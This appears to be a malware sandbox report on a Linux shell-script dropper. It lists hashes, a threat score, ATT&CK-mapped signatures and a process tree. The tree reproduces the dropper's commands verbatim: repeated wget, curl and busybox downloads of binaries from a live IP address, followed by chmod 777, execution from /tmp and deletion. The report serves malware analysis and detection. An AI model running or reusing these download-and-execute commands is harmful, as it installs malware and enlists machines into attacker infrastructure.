27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb

General

Target

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Size

10KB
MD5

0e701247eed8c2ac85ce4310d37e674d
SHA1

7ca0caf639c6d80baffe549e24e3018daaa8bbb8
SHA256

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
SHA512

0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
SSDEEP

96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
922	chmod
736	chmod
892	chmod
910	chmod
799	chmod
814	chmod
862	chmod
747	chmod
898	chmod
723	chmod
868	chmod
916	chmod
928	chmod
934	chmod
952	chmod
965	chmod
730	chmod
808	chmod
904	chmod
946	chmod
827	chmod
874	chmod
940	chmod
886	chmod
959	chmod
771	chmod
850	chmod
880	chmod

Executes dropped EXE 28 IoCs

Processes:

rpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk46wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChkC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0dorOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsHSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVArpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0do6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChrOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVAI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl

/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
1⤵
PID:693

/bin/rm
/bin/rm bins.sh
2⤵
PID:696

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:703

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:721

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:723

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:724

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:725

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:726

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:729

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:730

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:731

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:732

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:733

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:735

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:736

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:737

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:738

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:739

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:743

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:747

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:752

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:755

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:756

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:768

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:771

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:773

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:776

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:777

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:794

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:799

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:800

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:803

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:804

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:807

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:808

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:809

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:810

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:811

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:813

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:814

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:815

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:816

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:817

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:823

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:827

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:829

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:832

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:833

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:847

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:850

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:851

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:854

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:856

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:861

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:862

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:863

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:864

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:865

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:867

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:868

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:869

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:870

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:871

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:873

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:874

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:875

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:876

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:877

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:879

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:880

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:881

/bin/rm
rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:882

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:883

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:885

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:886

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:887

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:888

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:889

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:891

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:892

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:893

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:894

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:895

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:897

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:898

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:899

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:900

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:901

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:903

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:904

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:905

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:906

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:907

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:909

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:910

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:911

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:912

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:913

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:915

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:916

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:917

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:918

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:919

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:921

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:922

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:923

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:924

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:925

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:927

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:928

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:929

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:930

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:931

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:933

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:934

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:935

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:936

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:937

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:939

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:940

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
